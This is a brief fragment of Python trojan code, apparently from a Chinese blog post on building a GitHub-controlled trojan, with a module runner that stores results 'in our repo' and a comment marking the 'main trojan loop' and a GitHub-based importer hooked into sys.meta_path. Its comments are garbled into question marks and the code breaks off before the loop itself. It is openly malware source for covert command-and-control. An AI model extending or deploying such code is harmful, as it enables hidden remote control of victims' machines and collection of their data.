def module_runner(module):
task_queue.put(1)
#??????run?????????
result = sys.modules[module].run()
task_queue.get()
#????
# store the result in our repo
store_module_result(result)
return
# main trojan loop
#??sys.meta_path?github????????????sys.path
评论列表
文章目录